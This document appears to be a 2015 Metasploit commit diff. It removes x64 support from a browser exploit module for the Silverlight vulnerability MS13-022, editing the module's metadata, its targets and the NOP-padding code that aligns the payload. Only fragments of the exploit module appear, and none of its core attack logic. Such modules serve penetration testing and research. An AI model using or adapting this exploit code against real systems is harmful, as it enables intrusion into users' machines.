Land rapid7#4798, @wchen-r7's deletion of x64 support on ms13_022_silverlight_script_object

jvazquez-r7 · jvazquez-r7 · commit ef62e1fc04cf · 2015-02-21T01:11:09.000-06:00
* Ungenuine support, well deleted
diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -28,7 +28,7 @@ def initialize(info={})
         to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
         to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
         from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP
-        SP3 / Windows 7 SP1 on both x32 and x64 architectures.
+        SP3 / Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -55,7 +55,7 @@ def initialize(info={})
           'EXITFUNC'             => 'thread'
         },
       'Platform'       => 'win',
-      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Arch'           => ARCH_X86,
       'BrowserRequirements' =>
         {
           :source      => /script|headers/i,
@@ -65,16 +65,7 @@ def initialize(info={})
         },
       'Targets'        =>
         [
-          [ 'Windows x86',
-            {
-              'arch' => ARCH_X86
-            }
-          ],
-          [ 'Windows x64',
-            {
-              'arch' => ARCH_X86_64
-            }
-          ]
+          [ 'Windows x86/x64', {} ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => "Mar 12 2013",
@@ -96,10 +87,8 @@ def exploit_template(cli, target_info)
     my_payload = get_payload(cli, target_info)
 
     # Align to 4 bytes the x86 payload
-    if target_info[:arch] == ARCH_X86
-      while my_payload.length % 4 != 0
-        my_payload = "\x90" + my_payload
-      end
+    while my_payload.length % 4 != 0
+      my_payload = "\x90" + my_payload
     end
 
     my_payload = Rex::Text.encode_base64(my_payload)
